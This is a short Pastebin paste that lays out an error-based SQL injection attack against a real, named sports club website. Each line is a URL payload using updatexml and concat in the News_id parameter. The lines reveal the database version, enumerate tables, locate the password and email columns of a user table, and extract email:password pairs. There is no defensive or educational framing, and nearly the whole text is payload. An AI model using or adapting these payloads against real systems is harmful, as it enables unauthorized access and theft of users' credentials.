Advertisement
Guest User

Untitled

a guest
Jul 27th, 2017
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.03 KB | None | 0 0
  1. Version (5.6.36-log)
  2. http://www.tsv-stetten-akm.de/index.php?Cat=0201&News_id=1194 and updatexml(null,concat(0x3a,version()),null)
  3.  
  4. Table "user" (limit 20,1)
  5. http://www.tsv-stetten-akm.de/index.php?Cat=0201&News_id=1194 and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database()limit 20,1)),null)
  6.  
  7. Culumn "password" (limit 7,1)
  8. http://www.tsv-stetten-akm.de/index.php?Cat=0201&News_id=1194 and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database()
  9. and table_name=0x75736572 limit 7,1)),null)
  10.  
  11. Column "email" (limit 9,1)
  12. http://www.tsv-stetten-akm.de/index.php?Cat=0201&News_id=1194 and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database()
  13. and table_name=0x75736572 limit 9,1)),null)
  14.  
  15. Final query (email, password)
  16. http://www.tsv-stetten-akm.de/index.php?Cat=0201&News_id=1194 and updatexml(null,concat(0x3a,(select concat(email,0x3a,password)
  17. from user limit 0,1)),null)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement